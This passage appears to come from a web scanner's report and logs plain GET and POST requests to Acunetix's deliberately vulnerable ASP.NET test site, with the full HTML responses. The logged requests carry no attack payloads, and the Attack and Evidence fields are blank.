24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	GET
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 324 bytes.	GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 14064
Response Body - size: 14,064 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 395 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com Content-Length: 987 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 987 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8%2F4bzlRmUHIna4LG5&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpus%2FwCAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d%2Byr9JWRLj
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 12523
Response Body - size: 12,523 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div 